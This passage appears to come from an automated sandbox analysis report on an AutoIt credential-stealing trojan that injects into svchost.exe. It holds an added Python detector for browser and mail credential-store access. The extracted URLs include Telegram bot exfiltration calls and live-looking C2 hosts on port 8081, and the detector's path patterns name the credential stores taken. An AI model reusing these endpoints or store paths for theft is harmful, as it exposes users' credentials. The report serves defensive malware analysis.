                  Source: Yara match | File source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTR
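The "File opened" and "Key opened" rows in this section show the injected svchost.exe reading the Chrome and Edge Login Data, Cookies, Web Data, History and Top Sites files, the Postbox profile directory and the Outlook profile key under Windows Messaging Subsystem. The Python below is an added example, not part of the report and not code from the sample, of a rule that flags such access by any image other than the application that owns the store, and that scores an image by how many distinct products it touches. The owner mapping, the event layout and the benign chrome.exe row are assumptions constructed for the example; the paths are the ones listed above.

```python
"""Added example (not Joe Sandbox or sample code): flag credential-store reads by
processes that do not own the store, as the injected svchost.exe does in this report."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

Event = Dict[str, str]

# (product, pattern over the lower-cased path, images expected to open it).
# The owner mapping is an assumption; the paths come from the report.
STORES = [
    ("chrome", re.compile(r"\\google\\chrome\\user data\\.*\\(login data|web data|cookies|history|top sites)$"),
     {"chrome.exe"}),
    ("edge", re.compile(r"\\microsoft\\edge\\user data\\.*\\(login data|web data|cookies|history|top sites)$"),
     {"msedge.exe"}),
    ("postbox", re.compile(r"\\appdata\\roaming\\postboxapp\\profiles(\\|$)"), {"postbox.exe"}),
    ("outlook", re.compile(r"\\windows messaging subsystem\\profiles\\outlook\\9375cff0413111d3b88a00104b2a6676$"),
     {"outlook.exe"}),
]

# Constructed sample events mirroring the report's rows, plus one benign row and one non-store path.
SAMPLE_EVENTS: List[Event] = [
    {"image": r"C:\Windows\SysWOW64\svchost.exe", "op": "file_open",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Windows\SysWOW64\svchost.exe", "op": "file_open",
     "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"image": r"C:\Windows\SysWOW64\svchost.exe", "op": "file_open",
     "path": "C:\\Users\\user\\AppData\\Roaming\\PostboxApp\\Profiles\\"},
    {"image": r"C:\Windows\SysWOW64\svchost.exe", "op": "key_open",
     "path": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "op": "file_open",   # benign owner
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Windows\SysWOW64\svchost.exe", "op": "file_open",                          # not a store
     "path": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll"},
]


def matched_store(path: str) -> Optional[Tuple[str, Set[str]]]:
    """Return (product, owning images) when `path` is a known credential or profile store."""
    p = path.lower()
    for product, pattern, owners in STORES:
        if pattern.search(p):
            return product, owners
    return None


def _image_name(ev: Event) -> str:
    return ev["image"].rsplit("\\", 1)[-1].lower()


def check_access(ev: Event) -> Optional[str]:
    """One finding, or None when the path is not a store or the opener is its owner."""
    hit = matched_store(ev["path"])
    if hit is None:
        return None
    product, owners = hit
    if _image_name(ev) in owners:
        return None
    return f"{_image_name(ev)} opened {product} store via {ev['op']}: {ev['path']}"


def evaluate(events: List[Event]) -> List[Tuple[int, str]]:
    """(event index, finding) pairs for every non-owner store access."""
    hits: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        finding = check_access(ev)
        if finding:
            hits.append((i, finding))
    return hits


def harvesting_images(events: List[Event], threshold: int = 2) -> Dict[str, int]:
    """Images that touched stores of at least `threshold` distinct products they do not own.
    One browser file may be a backup tool; browser plus mail client in one process is a stealer."""
    products: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        hit = matched_store(ev["path"])
        if hit is None:
            continue
        product, owners = hit
        if _image_name(ev) not in owners:
            products[_image_name(ev)].add(product)
    return {img: len(p) for img, p in products.items() if len(p) >= threshold}


if __name__ == "__main__":
    for idx, finding in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
    print(harvesting_images(SAMPLE_EVENTS))
```

The open itself is the actionable event: a stealer running in the logged-on user's context generally has what it needs to unwrap the stored secrets, so waiting for a decryption artefact gains nothing. Scoring by distinct products is what separates this sample, which sweeps two browsers and two mail clients from one hollowed svchost.exe, from a legitimate tool that touches a single browser file.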

                  Remote Access Functionality

                  Source: Yara matchFile source: 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTR
Source: Yara match; File source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
Source: C:\Users\user\Desktop\B7N48hmO78.exe; Code function: 0_2_00E38C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00E38C4F
Source: C:\Users\user\Desktop\B7N48hmO78.exe; Code function: 0_2_00E3923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00E3923B
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe; Code function: 2_2_00D78C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 2_2_00D78C4F
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe; Code function: 2_2_00D7923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_00D7923B
MITRE ATT&CK Matrix (one row per line, cells separated by "|"; a number in front of a technique is the badge the report shows beside it, as extracted)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 111 Scripting | 2 Valid Accounts | 3 Native API | 111 Scripting | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 2 Valid Accounts | 2 Valid Accounts | 31 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 11 Software Packing | NTDS | 137 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 312 Process Injection | 1 DLL Side-Loading | LSA Secrets | 251 Security Software Discovery | SSH | 3 Clipboard Data | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 1 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 312 Process Injection | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph (rendered as text). ID: 1587603; Sample: B7N48hmO78.exe; Startdate: 10/01/2025; Architecture: WINDOWS; Score: 100. The numbers after a process name are the graph's created-file / registry-value counters, as shown.

Start node
  DNS/IP: reallyfreegeoip.org; api.telegram.org; 2 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
  reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
  api.telegram.org: Uses the Telegram API (likely for C&C communication)
  Started: B7N48hmO78.exe (4); wscript.exe (1)

B7N48hmO78.exe (4)
  Dropped: C:\Users\user\AppData\...\demonetised.exe, PE32
  Signatures: Binary is likely a compiled AutoIt script file
  Started: demonetised.exe (2)

wscript.exe (1)
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  Started: demonetised.exe (1)

demonetised.exe (2), started by B7N48hmO78.exe
  Dropped: C:\Users\user\AppData\...\demonetised.vbs, data
  Signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures
  Started: svchost.exe (15 2)

demonetised.exe (1), started by wscript.exe
  Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
  Started: svchost.exe (2)

svchost.exe (15 2), started by demonetised.exe (2)
  DNS/IP: checkip.dyndns.com 132.226.247.73, 49704, 49707, 49709, UTMEMUS, United States; api.telegram.org 149.154.167.220, 443, 49722, 49812, TELEGRAMRU, United Kingdom; reallyfreegeoip.org 104.21.32.1, 443, 49705, 49706, CLOUDFLARENETUS, United States

svchost.exe (2), started by demonetised.exe (1)
  Signatures: System process connects to network (likely due to code injection or exploit); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
Antivirus detection, submitted file
Source | Detection | Scanner | Label | Link
B7N48hmO78.exe | 73% | Virustotal | | Browse
B7N48hmO78.exe | 79% | ReversingLabs | Win32.Trojan.AutoitInject |
B7N48hmO78.exe | 100% | Joe Sandbox ML | |

Antivirus detection, dropped file
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\inhumate\demonetised.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\inhumate\demonetised.exe | 79% | ReversingLabs | Win32.Trojan.AutoitInject |
C:\Users\user\AppData\Local\inhumate\demonetised.exe | 73% | Virustotal | | Browse

No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 104.21.32.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | svchost.exe, 00000006.00000002.4525232764.000000000534E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20a | svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enhZ | svchost.exe, 00000003.00000002.4524898032.000000000543C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/lB | svchost.exe, 00000003.00000002.4524898032.0000000005477000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005349000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | svchost.exe, 00000006.00000002.4525232764.000000000531D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp | false | | high
http://aborters.duckdns.org:8081 | svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://anotherarmy.dns.army:8081 | svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enlB | svchost.exe, 00000003.00000002.4524898032.0000000005446000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005318000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | svchost.exe, 00000003.00000002.4524898032.0000000005390000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.000000000534A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000525F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000521A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | svchost.exe, 00000003.00000002.4524898032.0000000005390000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005320000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000525F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/hZ | svchost.exe, 00000003.00000002.4524898032.000000000546D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
